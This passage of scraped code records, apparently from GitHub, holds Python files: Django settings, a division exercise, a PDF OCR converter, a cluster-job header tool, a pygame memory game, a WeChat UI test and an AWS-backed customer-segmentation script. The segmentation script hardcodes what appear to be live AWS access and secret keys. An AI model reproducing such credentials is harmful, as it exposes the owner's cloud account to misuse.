path.join(SITE_ROOT, \"web\"),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\ntry:\n # load secret key from file to keep it out of vcs\n with open(path.join(SITE_ROOT, \".secret\"), \"r\") as secret:\n SECRET_KEY = secret.read()\nexcept IOError:\n from django.core.exceptions import ImproperlyConfigured\n raise ImproperlyConfigured(\n \"You need to place a secret key in a file called '.secret' in the \"\n \"project root.\\nFor example:\\n\\t$ ./manage.py generate_secret_key > .secret\"\n )\n\nfrom django.template.defaultfilters import slugify\nSOCIAL_AUTH_USERNAME_FIXER = lambda u: slugify(u)\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'main.middleware.HasAccountMiddleware',\n 'main.middleware.SiteVerificationCompletionMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.contrib.messages.context_processors.messages\",\n \"main.context_processors.google_analytics\",\n)\n\nSESSION_ENGINE = \"redis_sessions.backends.redis\"\n\nROOT_URLCONF = 'guardhouse.urls'\n\nTEMPLATE_DIRS = (\n path.join(SITE_ROOT, \"templates\"),\n)\n\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.twitter.TwitterBackend',\n 'social_auth.backends.google.GoogleBackend',\n 'social_auth.backends.OpenIDBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'django_extensions',\n 'compressor',\n 'south',\n 'sentry',\n 'sentry.client',\n 'social_auth',\n 'djcelery',\n\n 'content',\n 'main',\n 'sentry_wrap',\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n format: '%(levelname)s %(name)s(%(lineno)d): %(message)s',\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console':{\n 'level':'DEBUG',\n 'class':'logging.StreamHandler',\n 'formatter': 'default'\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'south': {\n 'level': 'INFO',\n 'propagate': False,\n },\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n },\n }\n}\n\ntry:\n from local_settings import *\nexcept ImportError:\n pass\n\nimport djcelery\ndjcelery.setup_loader()\n","repo_name":"ulope/guardhouse","sub_path":"guardhouse/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27326514536","text":"\"\"\" Реализовать функцию, принимающую два числа (позиционные аргументы) и\nвыполняющую их деление. Числа запрашивать у пользователя, предусмотреть\nобработку ситуации деления на ноль.\"\"\"\n# Исправленное задание\n\ndef function_inter():\n while True:\n try:\n x = float(input())\n except ValueError:\n print(\"Error! Это не число, попробуйте снова.\")\n else:\n return x\ndef division(n1,n2):\n return namber_1 / namber_2\n\nprint('Введите делимое : ')\nnamber_1 = function_inter()\nnamber_2 = 0\nwhile namber_2 == 0:\n print('Введите делитель : ')\n namber_2 = function_inter()\n if namber_2 == 0:\n print('Делить на ноль нельзя!')\nprint(\n f'Результат деления {namber_1} на {namber_2} равен : '\n f'{division(namber_1, namber_2)}')","repo_name":"RuslanSemenchenko1974/Seminar_4_HomeTask","sub_path":"4/Seminar_3_Task1.py","file_name":"Seminar_3_Task1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9035867543","text":"# 利用python将图片pdf转变为文字pdf:https://www.jb51.net/article/160621.htm\r\n\r\nimport os\r\nimport ghostscript\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\r\nfrom PythonMagick import Image\r\nfrom aip import AipOcr\r\nimport pdfkit\r\n\r\npath='??'\r\npdfname='??'\r\nDPI='85'\r\nAPP_ID='??'\r\nAPI_KEY='??'\r\nSECRET_KEY='??'\r\npath_wk=r'pdfkit安装位置设置'\r\npdfkit_config=pdfkit.configuration(wkhtmltopdf=path_wk)\r\npdfkit_options={'encoding':'UTF-8',}\r\n\r\nos.chdir(path)\r\npdf_input=PdfFileReader(open(pdfname, 'rb'))\r\npage_count=pdf_input.getNumPages()\r\npage_range=range(page_count)\r\n\r\nfor page_num in page_range:\r\n\tim=Image()\r\n\tim.density(DPI)\r\n\tim.read(pdfname + '[' + str(page_num) +']')\r\n\tim.write(str(page_num)+ '.jpg')\r\n\r\nclient=AipOcr(APP_ID, API_KEY, SECRET_KEY)\r\ndef get_file_content(filePath):\r\n\twith open(filePath, 'rb') as fp:\r\n\t\treturn fp.read()\r\n\r\noptions={}\r\noptions[\"language_type\"]=\"CHN_ENG\"\r\noptions[\"detect_direction\"]=\"false\"\r\noptions[\"detect_language\"]=\"false\"\r\noptions[\"probability\"]=\"false\"\r\nallteststr=[]\r\nfor page_num in page_range:\r\n\timage=get_file_content(r'%s\\%s.jpg' % (path, page_num))\r\n\ttestjson=client.basicGenral(image, options)\r\n\tteststr=''\r\n\tfor x in testjson['words_result']:\r\n\t\tteststr=teststr+x['words']+'
'\r\n\tallteststr.append(teststr)\r\n\r\nfor page_num in page_range:\r\n\tpadfkit.from_string((allteststr[page_num]), '%s.pdf' % (str(page_num)),configuration=pdfkit_config, options=pdfkit_options)\r\n\r\npdf_output=PdfFileWriter()\r\nfor page_num in page_range:\r\n\tos.chdir(path)\r\n\tpdf_input=PdfFlieReader(open('%s.pdf' % (str(page_num)), 'rb'))\r\n\tpage=pdf_input.getPage(0)\r\n\tpdf_output.addPage(page)\r\n\tpdf_output.write(open('newpdf.pdf', 'wb'))","repo_name":"hansvng/private_repository","sub_path":"transform_pdf_pic2word.py","file_name":"transform_pdf_pic2word.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6772130456","text":"#!/usr/bin env python\r\n# -*- coding:utf-8 -*-\r\n\r\nfrom __future__ import print_function\r\n\r\nimport argparse\r\nimport os\r\nimport os.path as op\r\nimport logging\r\nimport sys\r\n\r\nfrom multiprocessing import Pool, Process, cpu_count\r\nfrom TDGP.apps.base import debug, listify, ActionDispatcher\r\n\r\n\r\ndebug()\r\n\r\ndef main():\r\n\r\n actions = (\r\n (\"clusterHeader\", \"print header of cluster system\"),\r\n )\r\n p = ActionDispatcher(actions)\r\n p.dispatch(globals())\r\n\r\n\r\nclass Jobs(object):\r\n def __init__(self):\r\n pass\r\n\r\nclass Parallel(object):\r\n \"\"\"\r\n Run commands in parallel.\r\n \"\"\"\r\n def __init__(self, target, args, threads=cpu_count()):\r\n self.target = target\r\n self.args = args\r\n self.threads = min(len(args), threads)\r\n\r\n def run(self):\r\n p = Pool(self.threads)\r\n res = p.map(self.target, self.args)\r\n return res\r\n\r\n\r\ndef parallel(target, args, threads=cpu_count):\r\n p = Pool(min(len(args), threads))\r\n res = p.map(target, args)\r\n return res\r\n\r\n\r\n\r\nclass CMD(object):\r\n \"\"\"\r\n Linux command execute object\r\n\r\n Params:\r\n -------\r\n cmds: `list` command list\r\n threads: `int` number of thread\r\n\r\n Examples:\r\n ---------\r\n >>> cmds = ['sort file > sorted.file', 'sort file2 > sorted.file2‘]\r\n >>> CMD(cmds)\r\n \"\"\"\r\n\r\n def __init__(self, cmds, threads=4):\r\n\r\n self.cmds = listify(cmds)\r\n self.threads = threads\r\n self.run()\r\n \r\n def run(self):\r\n p = Parallel(os.system, self.cmds, self.threads)\r\n p.run()\r\n\r\n\r\n\r\nPBS_HEADER = \"\"\"#!/bin/bash\r\n#PBS -j oe {}\r\n#PBS -q {}\r\n#PBS -V \r\n#PBS -l nodes=1:ppn={} {}\r\n{}\r\nif [[ ! -z $PBS_O_WORKDIR ]]; then\r\n cd $PBS_O_WORKDIR\r\nfi\r\n\"\"\"\r\n\r\nSLURM_HEADER = \"\"\"#!/bin/bash {}\r\n#SBATCH --nodes=1 {}\r\n#SBATCH --ntasks-per-node={}\r\n#SBATCH --partition={}\r\n{}\r\nCURDIR=`pwd`\r\n\"\"\"\r\n\r\n\r\nSGE_HEADER = \"\"\"#!/bin/bash\r\n#$ -j y\r\n#$ -S /bin/bash\r\n#$ -cwd {}\r\n#$ -q {}\r\n#$ -pe mpi {} {}\r\n\"\"\"\r\nclass Cluster(object):\r\n \"\"\"\r\n class of cluster operation\r\n in order to execute successful should set \r\n the `CLUSTER` variants into ENV\r\n Params:\r\n --------\r\n \r\n Returns:\r\n ---------\r\n out: `str`: CLUSTER\r\n\r\n Functions:\r\n ---------\r\n get_header: get the header of cluster system with parameters\r\n get_raw_header: get the raw of cluster system with parameters\r\n\r\n \"\"\"\r\n \r\n def __init__(self, cluster=None, \r\n name=None, queue=None, \r\n threads=1, array=None,\r\n memory=None):\r\n self.CLUSTER = cluster if cluster else None\r\n if not self.CLUSTER:\r\n self.get()\r\n self.get_header(name, queue, threads, array, memory)\r\n self.get_raw_header()\r\n\r\n def get(self):\r\n \"\"\"\r\n To obtain the environment of `CLUSTER`,\r\n if not found will be set default `SGE`.\r\n \"\"\"\r\n try:\r\n self.CLUSTER = os.environ['CLUSTER']\r\n except KeyError:\r\n self.CLUSTER = 'SLURM'\r\n logging.warning('There is not environment `CLUSTER` in PATH')\r\n\r\n return self.CLUSTER\r\n\r\n\r\n def get_header(self, name=None, queue=None, \r\n threads=1, array=None,\r\n memory=None):\r\n \"\"\"\r\n According to the environment of `CLUSTER` to \r\n return a header of cluster system\r\n \"\"\"\r\n if self.CLUSTER.upper() == \"SGE\":\r\n name = \"\\n#$ -N \" + name if name else \"\"\r\n queue = queue if queue else \"all.q\"\r\n array = \"\\n#$ -t \" + array if array else \"\"\r\n mem = \"#$ -l mem_free={}\".format(memory) if memory else \"\"\r\n self.header = SGE_HEADER.format(name, queue, threads, array) \r\n self.header += mem\r\n elif self.CLUSTER.upper() == \"PBS\":\r\n name = \"\\n#PBS -N \" + name if name else \"\"\r\n queue = queue if queue else \"workq\"\r\n array = \"\\n#PBS -J \" + array if array else \"\"\r\n mem = \"#PBS -l mem={}\".format(memory) if memory else \"\"\r\n self.header = PBS_HEADER.format(name, queue, threads, array, mem)\r\n elif self.CLUSTER.upper() == \"TORQUE\":\r\n name = \"\\nPBS -N \" + name if name else \"\"\r\n queue = queue if queue else \"share\"\r\n array = \"\\n#PBS -J \" + array if array else \"\"\r\n mem = \"#PBS -l mem={}\".format(memory) if memory else \"\"\r\n self.header = PBS_HEADER.format(name, queue, threads, array, mem)\r\n elif self.CLUSTER.upper() == 'SLURM':\r\n queue = queue if queue else \"low\"\r\n name = \"\\n#SBATCH --job-name={}\".format(name) if name else \"\"\r\n array = \"\\n#SBATCH --array=\" + array if array else \"\"\r\n mem = \"\\n#SBATCH --mem={}\".format(memory) if memory else \"\"\r\n self.header = SLURM_HEADER.format(name, mem, threads, queue, array)\r\n else:\r\n logging.warning(\"there is not of header \"\r\n \"of cluster:`{}`\".format(self.CLUSTER))\r\n sys.exit()\r\n return self.header\r\n\r\n def get_raw_header(self):\r\n \"\"\"\r\n According to the environment of `CLUSTER` to \r\n return a header of cluster system\r\n \"\"\"\r\n if self.CLUSTER.upper() == \"SGE\":\r\n self.raw_header = SGE_HEADER\r\n elif self.CLUSTER.upper() == \"PBS\":\r\n self.raw_header = PBS_HEADER\r\n elif self.CLUSTER.upper() == \"TORQUE\":\r\n self.raw_header = PBS_HEADER\r\n elif self.CLUSTER.upper() == \"SLURM\":\r\n self.raw_header = SLURM_HEADER\r\n else:\r\n logging.warning(\"there is not of header \"\r\n \"of cluster:`{}`\".format(self.CLUSTER))\r\n sys.exit()\r\n return self.raw_header\r\n\r\n\r\n def __str__(self):\r\n return self.CLUSTER\r\n\r\n __retr__ = __str__\r\n \r\n### out command ###\r\ndef clusterHeader(args):\r\n \"\"\"\r\n %(prog)s \r\n print the header of clustes\r\n \"\"\" \r\n p = argparse.ArgumentParser(prog=clusterHeader.__name__,\r\n description=clusterHeader.__doc__,\r\n conflict_handler='resolve')\r\n pReq = p.add_argument_group('Required arguments')\r\n pOpt = p.add_argument_group('Optional arguments')\r\n pOpt.add_argument('-s', '--command', default=\"\",\r\n help='command of scripts [default: %(default)s]')\r\n pOpt.add_argument('-c', '--cluster', default=None, \r\n help='cluster system [default: auto]')\r\n pOpt.add_argument('-n', '--name', default=None,\r\n help='name of jobs in cluster [default: jobs name]')\r\n pOpt.add_argument('-q', '--queue', default=None, \r\n help='queue of cluster [default: auto]')\r\n pOpt.add_argument('-t', '--threads', default=1, type=int,\r\n help='threads number of program [default: %(default)s]')\r\n pOpt.add_argument('-m', '--memory', default=None,\r\n help='memory of program [default: %(default)s]')\r\n pOpt.add_argument('-a', '--array', default=None, \r\n help='array jobs [default: %(default)s]')\r\n pOpt.add_argument('-h', '--help', action='help',\r\n help='show help message and exit.')\r\n \r\n args = p.parse_args(args)\r\n cluster = Cluster(args.cluster, args.name, \r\n args.queue, args.threads,\r\n args.array, args.memory)\r\n print(cluster.header, file=sys.stdout)\r\n print(args.command, file=sys.stdout)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"wangyibin/TDGP","sub_path":"apps/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":7555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7203767727","text":"import pygame as pg\nimport sys\nimport random\nfrom pygame.locals import Rect\n\nGRID_SIZE = 4\t# Number of cells across row/column\nN_PIXELS = 100\t# Number of pixels in one cell across row/column\nN_SHAPES = 4\t# Number of shapes used in the game\nN_OCC = int((GRID_SIZE*GRID_SIZE)/N_SHAPES)\t# Number of occurences of a shape\ncells = [x for x in range(1,GRID_SIZE*GRID_SIZE+1)]\ncellObjects = []\nshapesarrangement = []\n\ndef drawBackground():\n\tfor i in range(GRID_SIZE):\n\t\tfor j in range(GRID_SIZE):\n\t\t\tcol = int(j)*N_PIXELS\n\t\t\trow = int(i)*N_PIXELS\n\t\t\trect_obj = Rect(col,row,N_PIXELS,N_PIXELS)\n\t\t\tcellObjects.append(rect_obj)\n\t\t\tpg.draw.rect(Window,(96,128,64),rect_obj,2)\n\ndef drawRecShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.rect(Window, color, Rect(col+20,row+20,60,60))\n\ndef drawCirShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.circle(Window, color, (col+50, row+50),30)\n\ndef drawTriShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.polygon(Window,color,((col+10,row+20),(col+90,row+20),(col+50,row+80)))\n\ndef drawDiamondShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.polygon(Window,color,((col+10,row+50),(col+50,row+20),(col+90,row+50),(col+50,row+80)))\n\ndef startGame():\n\tfor i in range(N_OCC):\n\t\tif i is 0 or i is 1: color = (0,0,255)\n\t\telse: color = (0,255,0)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawRecShape(x,color)\n\t\tcells.remove(x)\n\tfor i in range(N_OCC):\n\t\tif i is 0 or i is 1: color = (255,255,0)\n\t\telse: color = (0,255,255)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawCirShape(x,color)\n\t\tcells.remove(x)\n\tfor i in range(N_OCC):\n\t\tif i is 0 or i is 1: color = (255,0,255)\n\t\telse: color = (128,0,0)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawTriShape(x,color)\n\t\tcells.remove(x)\n\tfor i in range(N_OCC):\n\t\tif i is 0 or i is 1: color = (128,128,0)\n\t\telse: color = (128,0,128)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawDiamondShape(x,color)\n\t\tcells.remove(x)\n\ndef shapeIndex(mouse_pos):\n\tfor i in range(GRID_SIZE*GRID_SIZE):\n\t\tif cellObjects[i].collidepoint(mouse_pos):\n\t\t\treturn shapesarrangement.index(i+1)\n\ndef cellNo(mouse_pos):\n\tfor i in range(GRID_SIZE*GRID_SIZE):\n\t\tif cellObjects[i].collidepoint(mouse_pos):\n\t\t\treturn i+1\n\ndef rightchoice(firstchoice, secondchoice):\n\tx = shapeIndex(firstchoice)\n\ty = shapeIndex(secondchoice)\n\tfor i in range(0,16,2):\n\t\tj = i+1\n\t\tif ((x is i and y is j) or (x is j and y is i)):\n\t\t\treturn True\n\ndef hide(mouse_pos):\n\tcell_num = cellNo(mouse_pos)\n\tfor i in range(GRID_SIZE*GRID_SIZE):\n\t\tif cell_num is i+1:\n\t\t\tpg.draw.rect(Window,(255,255,255),cellObjects[i].inflate(-10,-10))\n\ndef show(mouse_pos):\n\tcell_num = cellNo(mouse_pos)\n\tshapeindex = shapeIndex(mouse_pos)\n\tif shapeindex is 0 or shapeindex is 1:\n\t\tcolor = (0,0,255)\n\t\tdrawRecShape(cell_num, color)\n\telif shapeindex is 2 or shapeindex is 3:\n\t\tcolor = (0,255,0)\n\t\tdrawRecShape(cell_num, color)\n\telif shapeindex is 4 or shapeindex is 5:\n\t\tcolor = (255,255,0)\n\t\tdrawCirShape(cell_num, color)\n\telif shapeindex is 6 or shapeindex is 7:\n\t\tcolor = (0,255,255)\n\t\tdrawCirShape(cell_num, color)\n\telif shapeindex is 8 or shapeindex is 9:\n\t\tcolor = (255,0,255)\n\t\tdrawTriShape(cell_num, color)\n\telif shapeindex is 10 or shapeindex is 11:\n\t\tcolor = (128,0,0)\n\t\tdrawTriShape(cell_num, color)\n\telif shapeindex is 12 or shapeindex is 13:\n\t\tcolor = (128,128,0)\n\t\tdrawDiamondShape(cell_num, color)\n\telif shapeindex is 14 or shapeindex is 15:\n\t\tcolor = (128,0,128)\n\t\tdrawDiamondShape(cell_num, color)\n\ndef main():\n\tpg.init()\n\tglobal Window\n\tWindow = pg.display.set_mode((GRID_SIZE*N_PIXELS, GRID_SIZE*N_PIXELS))\n\tWindow.fill((255,255,255))\n\tpg.display.set_caption('Memory Game')\n\n\tdrawBackground()\n\tstartGame()\n\tpg.display.update()\n\n\tpg.time.wait(3000)\n\tWindow.fill((255,255,255))\n\tdrawBackground()\n\tpg.display.update()\n\n\tflag = 0\n\ttruechoices = []\n\n\twhile True:\n\t\tfor event in pg.event.get():\n\t\t\tif event.type == pg.QUIT:\n\t\t\t\tpg.quit()\n\t\t\t\tsys.exit()\n\t\t\telif event.type==pg.MOUSEBUTTONUP:\n\t\t\t\tmouse_pos = pg.mouse.get_pos()\n\t\t\t\tshow(mouse_pos)\n\t\t\t\tpg.display.update()\n\t\t\t\tif flag is 0:\n\t\t\t\t\tfirstchoice = mouse_pos\n\t\t\t\t\tif cellNo(firstchoice) in truechoices: flag = 0\n\t\t\t\t\telse: flag = 1\n\t\t\t\telse:\n\t\t\t\t\tsecondchoice = mouse_pos\n\t\t\t\t\tif cellNo(secondchoice) in truechoices: flag = 1\n\t\t\t\t\telse: flag = 0\n\t\t\t\t\tif not (cellNo(firstchoice) in truechoices) and not (cellNo(secondchoice) in truechoices):\n\t\t\t\t\t\tif rightchoice(firstchoice, secondchoice):\n\t\t\t\t\t\t\ttruechoices.append(cellNo(firstchoice))\n\t\t\t\t\t\t\ttruechoices.append(cellNo(secondchoice))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpg.time.wait(1)\n\t\t\t\t\t\t\thide(firstchoice)\n\t\t\t\t\t\t\thide(secondchoice)\n\t\t\t\t\t\t\tpg.display.update()\n\n\t\t\tif len(truechoices) is GRID_SIZE*GRID_SIZE:\n\t\t\t\timage = pg.image.load('./winner-winner-boom-boom.png')\n\t\t\t\timage = pg.transform.scale(image, (GRID_SIZE*N_PIXELS+10,GRID_SIZE*N_PIXELS+10))\n\t\t\t\tWindow.blit(image, (0,0))\n\t\t\t\tFont1 = pg.font.SysFont('arial',32,True,True)\n\t\t\t\ttextsurface = Font1.render('Winner Winner Boom Boom!!!', True, (0,0,0))\n\t\t\t\tWindow.blit(textsurface, (N_PIXELS-80,N_PIXELS+50))\n\t\t\t\tpg.display.update()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"pranshuag9/Memory-Game-Using-PyGame","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70647828036","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: ijumper\n\nimport pytest\n\nfrom airtest.core.api import *\nfrom libs.pages.page import *\nfrom libs.utils.path import *\nfrom libs.const.app import *\nfrom libs.business.chats import *\n\n\ndef setup_function():\n # 自动初始化设备\n auto_setup(__file__)\n stop_app(wechat_package)\n\n\ndef teardown_function():\n stop_app(wechat_package)\n\n\ndef test_send_msg():\n start_app(wechat_package, activity=None)\n\n chats_page.btn_open.wait_for_appearance()\n if chats_page.btn_open.exists():\n print(\"start wechat succeed.\")\n else:\n print(\"start wechat failed, quit.\")\n return\n for i in range(5):\n send_msg_to(\"旺福\", \"你好\")\n","repo_name":"jumper2014/fast-test","sub_path":"test-framework-pytest-airtest-demo/suites/send/test_send_msg.py","file_name":"test_send_msg.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"61"} +{"seq_id":"70237120516","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport boto3\r\nimport csv\r\ncolor = sns.color_palette()\r\nfrom IPython.display import display, HTML\r\n# Creating the low level functional client\r\nclient = boto3.client(\r\n 's3',\r\n aws_access_key_id = 'AKIAI7M5MGZEAWGEXLNA',\r\n aws_secret_access_key = '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',\r\n region_name = 'us-east-2'\r\n)\r\nclientResponse = client.list_buckets()\r\n \r\n# Print the bucket names one by one\r\nprint('Printing bucket names...')\r\nfor bucket in clientResponse['Buckets']:\r\n print(f'Bucket Name: {bucket[\"Name\"]}')\r\n\r\n# Create the S3 object\r\nobj = client.get_object(\r\n Bucket = 'segmentationaws12',\r\n Key = 'Online_Retail.xlsx'\r\n)\r\n \r\n# Read data from the S3 object\r\ndf = pd.read_excel(obj['Body'])\r\nprint(df.head(10))\r\ndf.shape\r\ndf['Total_Price'] = df['UnitPrice']*df['Quantity']\r\n\r\ntst = df.groupby(['InvoiceDate','InvoiceNo'])\r\n \r\ntst.size()\r\n\r\n# converting \r\ndf['date'] = df['InvoiceDate'].map(lambda x: 100*x.year + x.month)\r\n\r\ntst = df.groupby(['date'])\r\ntst.size()\r\n\r\n# checking country-wise sales \r\nCust_country=df[['Country','CustomerID']].drop_duplicates()\r\n\r\n#Calculating the distinct count of customer for each country\r\nCust_country_count=Cust_country.groupby(['Country'])['CustomerID'].\\\r\naggregate('count').reset_index().sort_values('CustomerID', ascending=False)\r\n\r\n#Plotting the count of customers\r\ncountry=list(Cust_country_count['Country'])\r\nCust_id=list(Cust_country_count['CustomerID'])\r\nplt.figure(figsize=(12,8))\r\nsns.barplot(country, Cust_id, alpha=0.8, color=color[2])\r\nplt.xticks(rotation='60')\r\nplt.show()\r\n\r\nCust_date_UK=df[df['Country']=='United Kingdom']\r\nCust_date_UK=Cust_date_UK[['CustomerID','date']].drop_duplicates()\r\n\r\ndef recency(row):\r\n if row['date']>201110:\r\n val = 5\r\n elif row['date'] <= 201110 and row['date'] > 201108:\r\n val = 4\r\n elif row['date'] <= 201108 and row['date'] > 201106:\r\n val = 3\r\n elif row['date'] <= 201106 and row['date'] > 201104:\r\n val = 2\r\n else:\r\n val = 1\r\n return val\r\n\r\nCust_date_UK['Recency_Flag'] = Cust_date_UK.apply(recency, axis=1)\r\nCust_date_UK.head()\r\ntst = Cust_date_UK.groupby('Recency_Flag')\r\ntst.size()\r\nCust_freq=df[['Country','InvoiceNo','CustomerID']].drop_duplicates()\r\nCust_freq.head()\r\n\r\n#Calculating the count of unique purchase for each customer and his buying freq in descending order\r\nCust_freq_count=Cust_freq.groupby(['Country','CustomerID'])['InvoiceNo'].aggregate('count').\\\r\nreset_index().sort_values('InvoiceNo', ascending=False)\r\n\r\n\r\nCust_freq_count_UK=Cust_freq_count[Cust_freq_count['Country']=='United Kingdom']\r\nCust_freq_count_UK.head()\r\nunique_invoice=Cust_freq_count_UK[['InvoiceNo']].drop_duplicates()\r\nunique_invoice['Freqency_Band'] = pd.qcut(unique_invoice['InvoiceNo'], 5)\r\nunique_invoice=unique_invoice[['Freqency_Band']].drop_duplicates()\r\nunique_invoice\r\n\r\ndef frequency(row):\r\n if row['InvoiceNo'] <= 13:\r\n val = 1\r\n elif row['InvoiceNo'] > 13 and row['InvoiceNo'] <= 25:\r\n val = 2\r\n elif row['InvoiceNo'] > 25 and row['InvoiceNo'] <= 38:\r\n val = 3\r\n elif row['InvoiceNo'] > 38 and row['InvoiceNo'] <= 55:\r\n val = 4\r\n else:\r\n val = 5\r\n return val\r\n\r\nCust_freq_count_UK['Freq_Flag'] = Cust_freq_count_UK.apply(frequency, axis=1)\r\nCust_freq_count_UK.groupby(['Freq_Flag']).size()\r\nplt.figure(figsize=(12,8))\r\nsns.countplot(x='Freq_Flag', data=Cust_freq_count_UK, color=color[1])\r\nplt.ylabel('Count', fontsize=12)\r\nplt.xlabel('Freq_Flag', fontsize=12)\r\nplt.xticks(rotation='vertical')\r\nplt.title('Frequency of Freq_Flag', fontsize=15)\r\nplt.show()\r\nCust_monetary = df.groupby(['Country','CustomerID'])['Total_Price'].aggregate('sum').\\\r\nreset_index().sort_values('Total_Price', ascending=False)\r\nCust_monetary_UK=Cust_monetary[Cust_monetary['Country']=='United Kingdom']\r\n\r\nunique_price=Cust_monetary_UK[['Total_Price']].drop_duplicates()\r\nunique_price=unique_price[unique_price['Total_Price'] > 0]\r\nunique_price['monetary_Band'] = pd.qcut(unique_price['Total_Price'], 5)\r\nunique_price=unique_price[['monetary_Band']].drop_duplicates()\r\nunique_price\r\ndef monetary(row):\r\n if row['Total_Price'] <= 243:\r\n val = 1\r\n elif row['Total_Price'] > 243 and row['Total_Price'] <= 463:\r\n val = 2\r\n elif row['Total_Price'] > 463 and row['Total_Price'] <= 892:\r\n val = 3\r\n elif row['Total_Price'] > 892 and row['Total_Price'] <= 1932:\r\n val = 4\r\n else:\r\n val = 5\r\n return val\r\nCust_monetary_UK['Monetary_Flag'] = Cust_monetary_UK.apply(monetary, axis=1)\r\nCust_monetary_UK.groupby(['Monetary_Flag']).size()\r\n\r\nplt.figure(figsize=(12,8))\r\nsns.countplot(x='Monetary_Flag', data=Cust_monetary_UK, color=color[1])\r\nplt.ylabel('Count', fontsize=12)\r\nplt.xlabel('Monetary_Flag', fontsize=12)\r\nplt.xticks(rotation='vertical')\r\nplt.title('Frequency of Monetary_Flag', fontsize=15)\r\nplt.show()\r\n\r\nCust_UK_All=pd.merge(Cust_date_UK,Cust_freq_count_UK[['CustomerID','Freq_Flag']],\\\r\non=['CustomerID'],how='left')\r\nCust_UK_All=pd.merge(Cust_UK_All,Cust_monetary_UK[['CustomerID','Monetary_Flag']],\\\r\non=['CustomerID'],how='left')\r\n\r\n\r\nCust_UK_All.head(10)","repo_name":"Bala05104/Customer-segmentation","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4255807554","text":"import pytest\n\nfrom sisl.nodes import Node, Workflow\nfrom sisl.nodes.context import temporal_context\n\n\ndef test_node():\n @Node.from_func\n def sum_node(a, b):\n return a + b\n\n with temporal_context(lazy=True):\n val = sum_node(a=2, b=3)\n assert isinstance(val, sum_node)\n assert val.get() == 5\n\n with temporal_context(lazy=False):\n val = sum_node(a=2, b=3)\n assert val == 5\n\n\ndef test_node_inside_node():\n \"\"\"When a node class is called inside another node, it should never be lazy in its computation.\n\n That is, calling a node within another node is like calling a function.\n \"\"\"\n\n @Node.from_func\n def shift(a):\n return a + 1\n\n @Node.from_func\n def sum_node(a, b):\n a = shift(a)\n return a + b\n\n with temporal_context(lazy=True):\n val = sum_node(a=2, b=3)\n assert isinstance(val, sum_node)\n assert val.get() == 6\n\n with temporal_context(lazy=False):\n val = sum_node(a=2, b=3)\n assert val == 